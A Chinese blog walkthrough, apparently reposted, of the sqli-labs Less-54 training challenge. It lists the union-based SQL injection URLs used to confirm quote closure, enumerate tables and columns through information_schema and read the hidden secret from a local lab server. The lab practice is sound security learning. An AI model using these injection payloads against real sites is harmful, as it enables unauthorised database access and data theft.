【sqli-labs】 less54 GET -Challenge -Union -10 queries allowed -Variation1 (GET型挑战联合查询只允许10次查询变化1)

时间：2018-01-31 18:41:20 阅读：224 评论：0 收藏：0 [点我收藏+]

标签：get 联合恢复 alt div ast 技术分享 sele column

技术分享图片

尝试的次数只有10次

http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=1‘

单引号报错，错误信息没有显示

技术分享图片

加注释符页面恢复正常，判断为单引号闭合

http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=1‘%23

技术分享图片

通过页面信息可以判断查询的表至少有id，username，password三个字段，所以union select至少应该select3个字段

http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0‘ union select 1,user(),database()%23

技术分享图片

用group_concat函数连接所有表名

http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0‘ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘challenges‘%23

技术分享图片

只有一张表，查列名

http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0‘ union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=‘challenges‘ and table_name=‘13KLHT1VHR‘%23

技术分享图片

查询数据

http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0‘ union select 1,secret_R03R,tryy from 13KLHT1VHR limit 0,1%23

技术分享图片

提交

技术分享图片

成功

技术分享图片

【sqli-labs】 less54 GET -Challenge -Union -10 queries allowed -Variation1 (GET型挑战联合查询只允许10次查询变化1)

标签：get 联合恢复 alt div ast 技术分享 sele column

原文地址：https://www.cnblogs.com/superkrissV/p/8393232.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行

【sqli-labs】 less54 GET -Challenge -Union -10 queries allowed -Variation1 (GET型 挑战 联合查询 只允许10次查询 变化1)

【sqli-labs】 less54 GET -Challenge -Union -10 queries allowed -Variation1 (GET型挑战联合查询只允许10次查询变化1)